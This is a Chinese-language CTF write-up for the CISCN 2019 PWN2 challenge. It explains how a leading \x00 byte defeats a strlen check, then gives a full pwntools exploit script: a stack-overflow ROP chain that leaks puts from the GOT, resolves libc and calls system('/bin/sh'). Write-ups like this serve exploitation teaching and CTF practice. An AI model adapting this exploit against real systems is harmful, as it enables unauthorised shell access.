首先就是关于"\x00"截断问题，'\x00'被当做字符串的截止字符，这就很有趣了我们可以把\x00放在我们要发送数据的前面，经过\x00截断，后面的数据就不用读入了。。。。。。嘿嘿，好像听起来没什么用，确实我们在一般情况下需要注意这个问题，不能有\x00截断。现在我们要想想如何利用它，用它过检测机制如strlen一类的。当strlen检测字符串长度时检测到\x00就会发生截断，自然绕过了检测，结果就是null即0。

例题：[CISCN 2019东北]PWN2

 开始审计代码：上来就是死循环，fflush清空缓冲区，读入v4是整数，我们看看begin，一点用没有.

 

只有v4=1的时候 跳出轮回流，进入encrypt函数，然后begin。。。。既然begin函数没有用，那转机就在encrypt函数了

非常好，栈溢出啊，一定要溢出才行哦，不然不能getshell的qwq。看看下面的各种逆天映射，博🐖在第一次看的时候也是头昏眼花，本着小白的可爱，想着完成他的映射，后来实在射不出来，回头看了遍程序突然发现不用射了，可以直接绕过，吆西，管他映射干嘛，我用的可是溢出啊。

直接\x00不让strlen开始射前准备，打断施法。这样v0肯定大于strlen（s）直接break，吆西。

exp:

from pwn import *
from struct import pack
from ctypes import *
import base64
import gmpy2
def s(a):p.send(a)
def sla(a,b):p.sendlineafter(a,b)
def sl(a):p.sendline(a)
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def bug():gdb.attach(p)pause()
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'],libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux',arch='amd64',log_level='debug')
p= process('./CISCN2019')
elf=ELF('./CISCN2019')
rdi=0x0000000000400c83
libc=ELF("libc6_2.27-0ubuntu3_amd64.so")
sla("choice!",b'1')
payload=b'\x00'+b'a'*(0x57)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4009a0)
sla("Input your Plaintext to be encrypted",payload)
puts=get_addr()
print(hex(puts))
addr=puts-libc.sym['puts']
print(hex(addr))
sh=addr+next(libc.search(b'/bin/sh\x00'))
system=addr+libc.sym['system']
pay1=b'\x00'+b'a'*(0x57)+p64(rdi)+p64(sh)+p64(rdi+1)+p64(system)
sla('Input your Plaintext to be encrypted',pay1)
inter()